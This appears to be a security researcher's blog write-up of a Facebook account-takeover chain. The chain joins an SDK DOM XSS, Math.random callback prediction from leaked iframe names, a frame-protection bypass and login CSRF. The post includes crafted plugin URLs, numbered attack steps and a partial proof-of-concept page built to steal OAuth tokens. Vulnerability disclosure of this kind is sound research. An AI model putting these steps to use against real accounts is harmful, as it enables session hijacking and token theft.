<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Account Takeover in Facebook mobile app due to usage of cryptographically unsecure random number generator and XSS in Facebook JS SDK | Youssef Sammouda (sam0) personal blog</title>
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="Account Takeover in Facebook mobile app due to usage of cryptographically unsecure random number generator and XSS in Facebook JS SDK" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Facebook Javascript SDK and Facebook plugins" />
<meta property="og:description" content="Facebook Javascript SDK and Facebook plugins" />
<link rel="canonical" href="http://localhost:4000/uncategorized/2026/01/17/math-random-facebook-sdk.html" />
<meta property="og:url" content="http://localhost:4000/uncategorized/2026/01/17/math-random-facebook-sdk.html" />
<meta property="og:site_name" content="Youssef Sammouda (sam0) personal blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2026-01-17T00:00:00+02:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Account Takeover in Facebook mobile app due to usage of cryptographically unsecure random number generator and XSS in Facebook JS SDK" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2026-01-17T00:00:00+02:00","datePublished":"2026-01-17T00:00:00+02:00","description":"Facebook Javascript SDK and Facebook plugins","headline":"Account Takeover in Facebook mobile app due to usage of cryptographically unsecure random number generator and XSS in Facebook JS SDK","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/uncategorized/2026/01/17/math-random-facebook-sdk.html"},"url":"http://localhost:4000/uncategorized/2026/01/17/math-random-facebook-sdk.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Youssef Sammouda (sam0) personal blog" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Youssef Sammouda (sam0) personal blog</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Account Takeover in Facebook mobile app due to usage of cryptographically unsecure random number generator and XSS in Facebook JS SDK</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2026-01-17T00:00:00+02:00" itemprop="datePublished">Jan 17, 2026
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <h1 id="facebook-javascript-sdk-and-facebook-plugins">Facebook Javascript SDK and Facebook plugins</h1>
<hr />
<p><br /></p>

<p>Meta provides several embeddable plugins such as the <code class="language-plaintext highlighter-rouge">Like</code> button, <code class="language-plaintext highlighter-rouge">Customer Chat</code> plugin, and <code class="language-plaintext highlighter-rouge">Feedback</code> plugin. These plugins are hosted under <code class="language-plaintext highlighter-rouge">www.facebook.com</code> and are designed to be embedded into third-party websites using iframe elements.</p>

<p>The typical integration flow works as follows:</p>

<ol>
  <li>A website includes the <code class="language-plaintext highlighter-rouge">Facebook JavaScript SDK</code>.</li>
  <li>The site calls SDK functions such as <code class="language-plaintext highlighter-rouge">FB.init()</code> and <code class="language-plaintext highlighter-rouge">FB.ui()</code>.</li>
  <li>The SDK dynamically creates an iframe pointing to a plugin endpoint, for example the <code class="language-plaintext highlighter-rouge">https://www.facebook.com/plugins/customerchat.php</code> plugin</li>
  <li>The iframe is initialized with url parameters that include:
    <ul>
      <li>The host website origin</li>
      <li>A callback identifier which was randomly generated</li>
    </ul>
  </li>
</ol>

<p>Communication between the host website and the plugin iframe is implemented using <code class="language-plaintext highlighter-rouge">postMessage</code>.<br />
The plugin sends messages to its parent window, and the SDK on the host side listens for those messages and dispatches them internally.</p>

<p>To prevent arbitrary message injection, the SDK enforces two checks on received messages:</p>
<ul>
  <li>The message must originate from <code class="language-plaintext highlighter-rouge">www.facebook.com</code> (where the plugins are hosted)</li>
  <li>The message must include the correct callback identifier (random string)</li>
</ul>

<p>Only messages that satisfy both conditions are accepted and processed by the SDK.</p>

<h1 id="xss-in-javascript-sdk-customer-chat-plugin">XSS in JavaScript SDK Customer Chat Plugin</h1>
<hr />
<p><br />
While reviewing the Facebook JavaScript SDK, I noticed that the SDK registers a cross-window message listener for messages coming from the Customer Chat plugin iframe.</p>

<p>The relevant code sets up a message handler that forwards incoming messages to an internal event system <code class="language-plaintext highlighter-rouge">g.inform("xd." + a.type, a);</code>, which sends an event named <code class="language-plaintext highlighter-rouge">xd.&lt;type&gt;</code> with <code class="language-plaintext highlighter-rouge">&lt;type&gt;</code> form the incoming message.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nc">ES</span><span class="p">(</span><span class="dl">"</span><span class="s2">Object</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">assign</span><span class="dl">"</span><span class="p">,</span> <span class="o">!</span><span class="mi">1</span><span class="p">,</span> <span class="nx">j</span><span class="p">,</span> <span class="p">{</span>
                      <span class="na">app_id</span><span class="p">:</span> <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">sdk.Runtime</span><span class="dl">"</span><span class="p">).</span><span class="nf">getClientID</span><span class="p">(),</span>
                      <span class="na">locale</span><span class="p">:</span> <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">sdk.Runtime</span><span class="dl">"</span><span class="p">).</span><span class="nf">getLocale</span><span class="p">(),</span>
                      <span class="na">sdk</span><span class="p">:</span> <span class="dl">"</span><span class="s2">joey</span><span class="dl">"</span><span class="p">,</span>
                      <span class="na">kid_directed_site</span><span class="p">:</span> <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">sdk.Runtime</span><span class="dl">"</span><span class="p">).</span><span class="nf">getKidDirectedSite</span><span class="p">(),</span>
                      <span class="na">channel</span><span class="p">:</span> <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">sdk.XD</span><span class="dl">"</span><span class="p">).</span><span class="nf">handler</span><span class="p">(</span>
                        <span class="nf">function </span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span>
                          <span class="nx">a</span> <span class="o">!=</span> <span class="kc">null</span> <span class="o">&amp;&amp;</span> <span class="nx">g</span><span class="p">.</span><span class="nf">inform</span><span class="p">(</span><span class="dl">"</span><span class="s2">xd.</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">a</span><span class="p">.</span><span class="nx">type</span><span class="p">,</span> <span class="nx">a</span><span class="p">);</span>
                        <span class="p">},</span>
                        <span class="dl">"</span><span class="s2">parent.parent</span><span class="dl">"</span><span class="p">,</span>
                        <span class="o">!</span><span class="mi">0</span><span class="p">,</span>
                      <span class="p">),</span>
                    <span class="p">});</span>
</code></pre></div></div>

<p>This SDK setup handler/subscriber functions for these events. One such handler is registered as follows:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">this</span><span class="p">.</span><span class="nf">subscribe</span><span class="p">(</span><span class="dl">"</span><span class="s2">xd.mpn.setupIconIframe</span><span class="dl">"</span><span class="p">,</span> <span class="nf">function </span><span class="p">(</span><span class="nx">b</span><span class="p">)</span> <span class="p">{</span>
                    <span class="nx">a</span><span class="p">.</span><span class="nc">$CustomerChat20</span><span class="p">(</span><span class="nx">b</span><span class="p">);</span>
                  <span class="p">});</span>
</code></pre></div></div>

<p>When the event <code class="language-plaintext highlighter-rouge">xd.mpn.setupIconIframe</code> is received, the function <code class="language-plaintext highlighter-rouge">$CustomerChat20</code> is invoked with attacker-controlled data.</p>

<p>Inside this function, the SDK extracts an <code class="language-plaintext highlighter-rouge">iconSVG</code> field from the message and injects it directly into the DOM:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="nx">e</span><span class="p">.</span><span class="nx">$CustomerChat20</span> <span class="o">=</span> <span class="nf">function </span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span>
                  <span class="kd">var</span> <span class="nx">b</span> <span class="o">=</span> <span class="k">this</span><span class="p">;</span>
                  <span class="k">this</span><span class="p">.</span><span class="nx">$CustomerChat1</span> <span class="o">&amp;&amp;</span>
                    <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">sdk.DOM</span><span class="dl">"</span><span class="p">).</span><span class="nf">remove</span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">$CustomerChat1</span><span class="p">);</span>
                  <span class="kd">var</span> <span class="nx">e</span> <span class="o">=</span> <span class="nx">a</span><span class="p">.</span><span class="nx">frameName</span><span class="p">,</span>
                    <span class="nx">f</span> <span class="o">=</span> <span class="nx">a</span><span class="p">.</span><span class="nx">iconSVG</span><span class="p">,</span>
                    <span class="nx">g</span> <span class="o">=</span> <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">sdk.DialogUtils</span><span class="dl">"</span><span class="p">).</span><span class="nf">setupNewDialog</span><span class="p">(),</span>
                    <span class="nx">h</span> <span class="o">=</span> <span class="nc">ES</span><span class="p">(</span><span class="dl">"</span><span class="s2">JSON</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">parse</span><span class="dl">"</span><span class="p">,</span> <span class="o">!</span><span class="mi">1</span><span class="p">,</span> <span class="nx">a</span><span class="p">.</span><span class="nx">cssText</span><span class="p">),</span>
                    <span class="nx">i</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">"</span><span class="s2">div</span><span class="dl">"</span><span class="p">);</span>
                  <span class="nx">f</span> <span class="o">!=</span> <span class="kc">null</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">sdk.DOM</span><span class="dl">"</span><span class="p">).</span><span class="nf">html</span><span class="p">(</span><span class="nx">i</span><span class="p">,</span> <span class="nx">f</span><span class="p">),</span>

</code></pre></div></div>

<p>Because <code class="language-plaintext highlighter-rouge">iconSVG</code> is injected without sanitization, this results in a DOM-based cross-site scripting vulnerability on the host website.</p>

<p>At this stage, exploitation appears impossible due to two constraints:</p>

<ul>
  <li>Messages must originate from <code class="language-plaintext highlighter-rouge">www.facebook.com</code></li>
  <li>The attacker must know the random callback string</li>
</ul>

<h3 id="i---sending-messages-from-wwwfacebookcom">I - Sending messages from www.facebook.com</h3>
<hr />
<p><br />
To satisfy the message origin requirement, I identified the following endpoint:</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://www.facebook.com/plugins/feedback.php?
<span class="err">&amp;</span>api_key
<span class="err">&amp;</span>channel_url=https://staticxx.facebook.com/x/connect/xd_arbiter/?version=42%23
    %26relation=parent.parent.frames[0]
    %26cb=${encodeURIComponent(INJECTION_POINT)}
    %26origin=${target}
<span class="err">&amp;</span>href=https%3A%2F%2Fwww.facebook.com%2F
<span class="err">&amp;</span>locale=en_US
<span class="err">&amp;</span>numposts=10
<span class="err">&amp;</span>order_by=time
<span class="err">&amp;</span>sdk=joey<span class="err">&amp;</span>version=v2.3
<span class="err">&amp;</span>width=600
<span class="err">&amp;</span>_rdr`
</code></pre></div></div>

<p>When loaded, this plugin sends a message from a Facebook origin to the embedding website that loaded the SDK with <code class="language-plaintext highlighter-rouge">INJECTION_POINT</code> in the message without any sanitization, meaning that it’s possible to <code class="language-plaintext highlighter-rouge">&amp;</code> andd more text.</p>

<h3 id="ii---random-string-generation">II - Random String Generation</h3>
<hr />
<p><br />
To validate incoming postMessage events, the Facebook JavaScript SDK relies on a callback identifier generated at runtime. This identifier is treated as a shared secret between the host page and the embedded plugin iframe, and is required for message acceptance.</p>

<p>Tracing the generation of this identifier reveals that it is produced by the following helper module:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
 <span class="nf">__d</span><span class="p">(</span>
            <span class="dl">"</span><span class="s2">guid</span><span class="dl">"</span><span class="p">,</span>
            <span class="p">[],</span>
            <span class="nf">function </span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">c</span><span class="p">,</span> <span class="nx">d</span><span class="p">,</span> <span class="nx">e</span><span class="p">,</span> <span class="nx">f</span><span class="p">)</span> <span class="p">{</span>
              <span class="kd">function</span> <span class="nf">a</span><span class="p">()</span> <span class="p">{</span>
                <span class="k">return </span><span class="p">(</span>
                  <span class="dl">"</span><span class="s2">f</span><span class="dl">"</span> <span class="o">+</span>
                  <span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nf">random</span><span class="p">()</span> <span class="o">*</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">30</span><span class="p">)).</span><span class="nf">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">).</span><span class="nf">replace</span><span class="p">(</span><span class="dl">"</span><span class="s2">.</span><span class="dl">"</span><span class="p">,</span> <span class="dl">""</span><span class="p">)</span>
                <span class="p">);</span>
              <span class="p">}</span>
              <span class="nx">f</span><span class="p">[</span><span class="dl">"</span><span class="s2">default</span><span class="dl">"</span><span class="p">]</span> <span class="o">=</span> <span class="nx">a</span><span class="p">;</span>
            <span class="p">},</span>
            <span class="mi">66</span><span class="p">,</span>
          <span class="p">);</span>

</code></pre></div></div>

<p>The callback value is therefore derived directly from <code class="language-plaintext highlighter-rouge">Math.random()</code>, a non‑cryptographic pseudo‑random number generator.</p>

<p>This introduces a critical trust boundary violation: a value that is used as an <em>authentication primitive</em> for cross‑origin messaging is generated using a mechanism that provides no unpredictability guarantees against an active attacker.</p>

<h4 id="1-why-mathrandom-is-inappropriate-in-this-context">1) Why Math.random Is Inappropriate in This Context</h4>

<p><code class="language-plaintext highlighter-rouge">Math.random()</code> is implemented as a deterministic PRNG whose internal state evolves predictably. While sufficient for non‑security use cases (UI randomness, sampling, etc.), it is explicitly unsuitable for any scenario where unpredictability is relied upon for security decisions.</p>

<p>In this case, the callback identifier functions as:</p>
<ul>
  <li>A message authentication token</li>
  <li>A gatekeeper for privileged SDK message handlers</li>
  <li>The sole barrier preventing arbitrary message injection</li>
</ul>

<p>Once an attacker can observe a sequence of outputs from the same PRNG instance, the internal state can be inferred. This allows the attacker to:</p>
<ul>
  <li>Predict future outputs</li>
  <li>Reconstruct recently generated past values</li>
  <li>Forge valid callback identifiers without guessing</li>
</ul>

<p>The security of the entire message validation mechanism therefore collapses if PRNG outputs can be observed.</p>

<h4 id="2-observing-prng-outputs-via-plugin-iframe">2) Observing PRNG outputs via Plugin iframe</h4>
<p>Further analysis of SDK internals shows that the same <code class="language-plaintext highlighter-rouge">guid()</code> function is reused when creating plugin iframes. Specifically, if an explicit iframe name is not provided, the SDK generates one automatically:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
 <span class="nf">__d</span><span class="p">(</span>
            <span class="dl">"</span><span class="s2">sdk.createIframe</span><span class="dl">"</span><span class="p">,</span>
            <span class="p">[</span><span class="dl">"</span><span class="s2">DOMEventListener</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">getBlankIframeSrc</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">guid</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">isNumberLike</span><span class="dl">"</span><span class="p">],</span>
            <span class="nf">function </span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">c</span><span class="p">,</span> <span class="nx">d</span><span class="p">,</span> <span class="nx">e</span><span class="p">,</span> <span class="nx">f</span><span class="p">,</span> <span class="nx">g</span><span class="p">)</span> <span class="p">{</span>
              <span class="kd">function</span> <span class="nf">a</span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span>
                <span class="kd">var</span> <span class="nx">b</span> <span class="o">=</span> <span class="nc">ES</span><span class="p">(</span><span class="dl">"</span><span class="s2">Object</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">assign</span><span class="dl">"</span><span class="p">,</span> <span class="o">!</span><span class="mi">1</span><span class="p">,</span> <span class="p">{},</span> <span class="nx">a</span><span class="p">),</span>
                  <span class="nx">e</span><span class="p">,</span>
                  <span class="nx">f</span> <span class="o">=</span> <span class="nx">b</span><span class="p">.</span><span class="nx">name</span> <span class="o">||</span> <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">guid</span><span class="dl">"</span><span class="p">)(),</span>

</code></pre></div></div>

<p>This value becomes the <code class="language-plaintext highlighter-rouge">window.name</code> of the newly created iframe.</p>

<p>Because iframe names are part of the browsing context and persist across navigations, this creates an unintended side channel: any party that can later obtain same‑origin access to the iframe window can read the name and recover a raw <code class="language-plaintext highlighter-rouge">Math.random()</code> output.</p>

<p>This means that plugin iframe creation leaks PRNG outputs that originate from the same generator instance responsible for producing message callback identifiers. However, in practice, most websites embed only a single Facebook plugin per page. This initially appears to limit exploitation, as reconstructing PRNG state typically requires observing multiple sequential outputs.</p>

<p>However, the SDK exposes additional behavior that allows forced regeneration of plugin iframes without requiring a full page reload.</p>

<h4 id="3-forcing-reinitialization-via-initpost">3) Forcing reinitialization via init:post</h4>
<hr />
<p><br />
The SDK registers other listeners beside <code class="language-plaintext highlighter-rouge">xd.&lt;type&gt;</code> ones targeting plugins, one of them is the <code class="language-plaintext highlighter-rouge">init:post</code> event:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="nx">sdk</span><span class="p">.</span><span class="nx">Event</span><span class="p">.</span><span class="nf">subscribe</span><span class="p">(</span><span class="dl">"</span><span class="s2">init:post</span><span class="dl">"</span><span class="p">,</span> <span class="nf">function </span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">if </span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">xfbml</span><span class="p">)</span> <span class="p">{</span>
    <span class="nx">XFBML</span><span class="p">.</span><span class="nf">parse</span><span class="p">();</span>
  <span class="p">}</span>
<span class="p">});</span>

</code></pre></div></div>

<p>When a message containing <code class="language-plaintext highlighter-rouge">xfbml: true</code> is received, the SDK re‑parses the page and re‑initializes all XFBML plugins. From the SDK’s perspective, this is equivalent to the initial page load.</p>

<p>Each reinitialization:</p>
<ul>
  <li>Destroys the existing plugin iframe</li>
  <li>Creates a new iframe</li>
  <li>Generates a new iframe name via <code class="language-plaintext highlighter-rouge">guid()</code></li>
  <li>Advances the PRNG state</li>
</ul>

<p>By repeatedly triggering this event, an attacker can force the SDK to emit an arbitrary number of PRNG outputs.</p>

<h4 id="4-extracting-iframe-window-names">4) Extracting iframe window names</h4>

<p>To read the generated iframe names, the attacker must control the top‑level browsing context.</p>

<p>The attack layout is as follows:</p>

<ul>
  <li>The attacker embeds the victim website in an iframe</li>
  <li>The victim website embeds the Facebook plugin iframe</li>
  <li>The attacker navigates the plugin iframe to an attacker‑controlled origin via <code class="language-plaintext highlighter-rouge">window.frames[0].frames[0] = "https://attacker.com"</code></li>
  <li>Same‑origin access is restored</li>
  <li>The attacker reads the iframe name via <code class="language-plaintext highlighter-rouge">window.frames[0].frames[0].name</code></li>
</ul>

<p>This technique requires the victim website to allow framing, either due to missing <code class="language-plaintext highlighter-rouge">X-Frame-Options</code> or a permissive <code class="language-plaintext highlighter-rouge">frame-ancestors</code> CSP directive.</p>

<h4 id="5-attack-attempt-1">5) Attack Attempt #1</h4>

<ul>
  <li>Attacker embeds victim website in an iframe</li>
  <li>Victim website embeds Facebook Customer Chat plugin via Facebook SDK</li>
  <li>Attacker leaks plugin iframe window name</li>
  <li>Attacker forces plugin reinitialization</li>
  <li>Attacker repeats above 2 steps multiple times</li>
  <li>Attacker reconstructs Math.random state</li>
  <li>Attacker calculates callback string</li>
  <li>Attacker sends crafted message from <code class="language-plaintext highlighter-rouge">www.facebook.com</code> origin</li>
  <li>DOM XSS is triggered on the victim website</li>
</ul>

<p>While the exploit chain is technically complete, the immediate impact is constrained by deployment realities:</p>

<ul>
  <li>The XSS occurs on the embedding website, not on www.facebook.com</li>
  <li>Exploitation depends on framing being allowed</li>
  <li>Many high‑value sites enforce strict framing policies</li>
</ul>

<p>As a result, exploitation against arbitrary third‑party websites would likely be assessed as low to medium impact. This motivated a shift in focus toward identifying Facebook‑owned surfaces that:</p>
<ul>
  <li>Embed the affected plugin</li>
  <li>Allow framing or equivalent access</li>
  <li>Elevate the impact to a first‑party security issue</li>
</ul>

<h3 id="iii---iframe-protection-bypass-in-wwwfacebookcom">III - Iframe protection bypass in www.facebook.com</h3>
<hr />
<p><br />
Finding a particular page with a misconfigured <code class="language-plaintext highlighter-rouge">XFO</code> or <code class="language-plaintext highlighter-rouge">frame-ancestors</code> won’t cut it since we have another condition later to find a Facebook page with the customer plugin embedded.
Realistically, it would be unlikely to find a single page with the two conditions met, so i focused on finding a more general issue that would affect the entire website, likely it was possible to find one:</p>

<p>While playing around in Facebook mobile application in iOS/Android, i noticed that in some requests the XFO header would be like this:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">X-Frame-Options: SAMEORIGIN</code></li>
</ul>

<p>Although this is totally normal, i probably never saw it before used in WEB. This made me suspicious, so i tried to load a page that has <code class="language-plaintext highlighter-rouge">frame-ancestors</code> set to any domain. As a result the returned XFO was found to be set :</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">X-Frame-Options: ALLOW-FROM domain</code></li>
</ul>

<p>This is perfect! it means that there’s actually no frame protection at all, since <code class="language-plaintext highlighter-rouge">ALLOW-FROM</code> is not supported anymore in modern browsers.</p>

<p>Okay so now we have a trick that we can use to disable frame protection, however this trick would only work if a page in normal conditions in web would return <code class="language-plaintext highlighter-rouge">frame-ancestors</code> and allow at least one domain. Unfortunately, this added another condition to already 2 previous conditions so we needed to find a bypass for this.</p>

<h3 id="iv---forcing-frame-ancestors-embed-in-wwwfacebookcom-pages">IV - Forcing frame-ancestors embed in www.facebook.com pages</h3>
<hr />

<p>As we said now we need a way to make any page return <code class="language-plaintext highlighter-rouge">frame-ancestors: anydomain</code> so the bug above triggers.
It was found that Facebook has this feature, it’s called <code class="language-plaintext highlighter-rouge">Compat</code> and it allows other subdomains to include/iframe a page in other subdomains. If any page was appended the parameter:</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">&amp;</span>cquick=1
<span class="err">&amp;</span>cquick_token=TOKEN
<span class="err">&amp;</span>ctarget=https://www.facebook.com
</code></pre></div></div>

<p>It will return <code class="language-plaintext highlighter-rouge">frame-ancestors: https://www.facebook.com</code> and trigger the previous bug ( of course in a mobile env inside Facebook app webview).</p>

<p>However, you probably noticed the <code class="language-plaintext highlighter-rouge">TOKEN</code>, which immediately raises red flags. It turns out this token is tied to the currently authenticated user, meaning it’s impossible to trigger the compatibility behavior in a victim’s session without knowing their token.</p>

<p>At this point, I had the idea of attempting a classic <code class="language-plaintext highlighter-rouge">login CSRF</code> into my own account. Naturally, this would only lead to XSSing myself, so an additional constraint was needed: we must keep a valid Facebook page open inside an iframe. This page needs to contain something of value in its body, and crucially it must not refresh when it detects a session change.</p>

<h3 id="v---facebook-page-with-customer-chat-plugin-loaded">V - Facebook page with customer chat plugin loaded</h3>

<p>It was dicovered that the page <code class="language-plaintext highlighter-rouge">https://www.facebook.com/business/goals/add-live-chat-to-website-with-messenger</code> had Facebook SDK and loaded the customer chat plugin as a demonstration for the plugin.</p>

<h3 id="vi---predicting-mathrandom-seed">VI - Predicting Math.random() seed</h3>

<p>To avoid making this write-up any longer than it already is, I highly recommend watching PwnFunction’s excellent <a href="https://www.youtube.com/watch?v=-h_rj2-HP2E">video</a> on this topic. You should also check out his <a href="https://github.com/PwnFunction/v8-randomness-predictor/blob/main/main.py">Github repository</a> and the accompanying resources.</p>

<p>My attack did not introduce anything fundamentally new; the only required change was a slight modification to the solver so it would still work even when the supplied seeds were not consecutive. Because the iframe reinitialization trick resets everything, each iframe window name we obtain is actually two steps behind the previous one:</p>

<p>1) Math.random() value for <code class="language-plaintext highlighter-rouge">window.name</code></p>

<p>2) Math.random() value for <code class="language-plaintext highlighter-rouge">callback function</code> &lt;—— Z3 needs to skip this</p>

<p>3) Math.random() value for <code class="language-plaintext highlighter-rouge">iframe id</code> &lt;—— Z3 needs to skip this</p>

<h2 id="final-attack">Final Attack</h2>
<hr />
<p><br /></p>

<p>1) Victim vists attacker’s website in Facbook App</p>

<p>2) Attacker website opens in Facebook App Webview</p>

<p>3) Attacker creates an iframe <code class="language-plaintext highlighter-rouge">[ name:MAIN ]</code>, and load a Facebook page which would contain a sensitive value like OAuth code/token ( xd_arbiter page or /dialog/oauth + ajaxpipe/__a parameters to avoid reloads)</p>

<p>4) Attacker performs a Logout CSRF</p>

<p>5) Attacker performs a Login CSRF into his account</p>

<p>4) Attacker creates another iframe, and loads the Facebook page with customer chat plugin:</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://secure.facebook.com/business/goals/add-live-chat-to-website-with-messenger?
<span class="err">&amp;</span>cquick=1
<span class="err">&amp;</span>cquick_token=ATTACKE_TOKEN
<span class="err">&amp;</span>ctarget=https://www.facebook.com
</code></pre></div></div>

<p>5) Attacker redirects <code class="language-plaintext highlighter-rouge">window.frames[1].frames[0]</code> ( containing the plugin script ) to attacker website</p>

<p>6) Attacker saves <code class="language-plaintext highlighter-rouge">window.frames[1].frames[0].name</code></p>

<p>7) Attacker force reinitialization via <code class="language-plaintext highlighter-rouge">init:post</code></p>

<p>8) Attacker repeats steps <code class="language-plaintext highlighter-rouge">5</code>, <code class="language-plaintext highlighter-rouge">6</code> and <code class="language-plaintext highlighter-rouge">7</code> until he gets at least 4 values</p>

<p>9) Attacker sends <code class="language-plaintext highlighter-rouge">Math.random()</code> values to the backend, and gets the next values</p>

<p>10) Attacker force reinitialization via <code class="language-plaintext highlighter-rouge">init:post</code></p>

<p>11) Attacker sends payload message to <code class="language-plaintext highlighter-rouge">window.frames[1]</code> from <code class="language-plaintext highlighter-rouge">facebook.com</code> with the correct callback identifier, using trick in <code class="language-plaintext highlighter-rouge">I</code></p>

<p>12) DOM-XSS achieved in <code class="language-plaintext highlighter-rouge">www.facebook.com</code>, the script would access same-origin iframe <code class="language-plaintext highlighter-rouge">[ name:MAIN ]</code> via <code class="language-plaintext highlighter-rouge">top.frames[0]</code> and reads victim OAuth token</p>

<h2 id="proof-of-concept">Proof of concept</h2>
<hr />
<p><br /></p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;html&gt;</span>
    <span class="nt">&lt;head&gt;</span>
    <span class="nt">&lt;/head&gt;</span>
    <span class="nt">&lt;body&gt;</span>

        <span class="nt">&lt;iframe</span> <span class="na">width=</span><span class="s">"1"</span> <span class="na">height=</span><span class="s">"1"</span> <span class="na">name=</span><span class="s">"oauth"</span> <span class="na">src=</span><span class="s">"https://www.facebook.com/dialog/oauth..."</span><span class="nt">&gt;&lt;/iframe&gt;</span>
        <span class="nt">&lt;iframe</span> <span class="na">style=</span><span class="s">"position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"</span> <span class="na">id=</span><span class="s">"theframe"</span> <span class="na">name=</span><span class="s">"ddoc"</span> <span class="na">src=</span><span class="s">""</span><span class="nt">&gt;&lt;/iframe&gt;</span>
        <span class="nt">&lt;iframe</span> <span class="na">width=</span><span class="s">"1"</span> <span class="na">height=</span><span class="s">"1"</span> <span class="na">name=</span><span class="s">"reload"</span> <span class="na">src=</span><span class="s">""</span><span class="nt">&gt;&lt;/iframe&gt;</span>

        <span class="nt">&lt;script&gt;</span>
        
        <span class="nx">cquick_token</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">ATTACKER_COMPAT_TOKEN</span><span class="dl">"</span><span class="p">;</span>
        <span class="nx">BACKEND_URL</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">ATTACKER_WEBSITE_SOLVER</span><span class="dl">"</span><span class="p">;</span>
        <span class="nx">list_math_random</span><span class="o">=</span> <span class="p">{};</span>

        <span class="cm">/* ==================== STEP 0 ==================== */</span>

        <span class="cm">/* Logout / Login CSRF */</span>
        
        <span class="cm">/* ==================== STEP 1 ==================== */</span>

        <span class="nb">window</span><span class="p">.</span><span class="nx">onload</span> <span class="o">=</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span>

          <span class="c1">// Setup a message listener to collect Math.random() values from plugin iframe</span>

          <span class="nb">window</span><span class="p">.</span><span class="nx">onmessage</span> <span class="o">=</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
